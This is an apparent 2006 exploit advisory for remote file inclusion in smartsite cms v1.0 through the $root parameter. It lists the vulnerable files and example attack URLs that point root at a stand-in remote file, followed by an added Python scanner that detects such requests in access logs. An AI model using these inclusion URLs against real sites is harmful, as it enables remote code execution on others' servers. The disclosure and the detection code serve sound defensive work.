smartsite cms v1.0 Multiple Remote File include
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
Arabian Security Team
-------------------------------------------------
site of script:www.smartsitecms.net
-------------------------------------------------
Vulnerable: smartsite cms v1.0
-------------------------------------------------
vulnerable code:
----------------------
1-in comment.php :
require($root . "include/inc_foot.php");
---------------------------------------
2-in /admin/test.php :
require($root . "include/inc_adminfooter.php");
---------------------------------------
3-in /admin/index.php :
require($root . "admin/include/inc_adminfooter.php");
---------------------------------------
4-in /admin/include/inc_adminfoot.php:
require($root . "include/inc_footer.php");
---------------------------------------
$root parameter File include
-------------------------------------------------
vulnerable files :
--------------------
comment.php
/admin/test.php
/admin/index.php
/admin/include/inc_adminfoot.php
-------------------------------------------------
example:
www.example.com/(path)/admin/test.php?root=http://evilcode.txt?
www.example.com/(path)/comment.php?root=http://evilcode.txt?
www.example.com/(path)/admin/index.php?root=http://evilcode.txt??root=http://evilcode.txt?
www.example.com/(path)/admin/include/inc_adminfoot.php?root=http://evilcode.txt?
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
E-mail:KARKOR23@hotmail.com
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3, mr-hcr AND ALL LEZR.COM Member

# milw0rm.com [2006-07-01]
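
A defender-side check for the pattern above, as an added example that is not part of the original advisory: it scans web access log lines for requests to the four listed scripts whose `root` query parameter carries a URL. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Scripts the advisory lists as vulnerable, matched as path suffixes
# because the install prefix differs per site.
VULNERABLE_SUFFIXES = ("/comment.php", "/admin/test.php", "/admin/index.php",
                       "/admin/include/inc_adminfoot.php")
# Assumption: a legitimate $root is a local path prefix, never "scheme://...".
URL_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_root(log_line):
    """Return the decoded `root` value if the line matches, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith(VULNERABLE_SUFFIXES):
        return None
    # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F" is caught too.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == "root" and URL_SCHEME.match(value):
            return value
    return None


def scan(lines):
    """Return (line_number, root_value) for every matching log line."""
    checked = ((n, suspicious_root(line)) for n, line in enumerate(lines, 1))
    return [(n, value) for n, value in checked if value is not None]


# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2006:10:00:00 +0000] "GET /cms/comment.php?id=4 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jul/2006:10:00:05 +0000] "GET /cms/admin/test.php?root=http://files.example.net/a.txt? HTTP/1.1" 200 310',
    '192.0.2.77 - - [01/Jul/2006:10:00:09 +0000] "GET /cms/comment.php?root=http%3A%2F%2Ffiles.example.net%2Fa.txt%3F HTTP/1.1" 200 298',
    '192.0.2.10 - - [01/Jul/2006:10:00:12 +0000] "GET /cms/index.php?root=http://files.example.net/a.txt HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: root={value}")
```

The check only sees values carried in the URL; a `root` value sent in a request body does not appear in an access log.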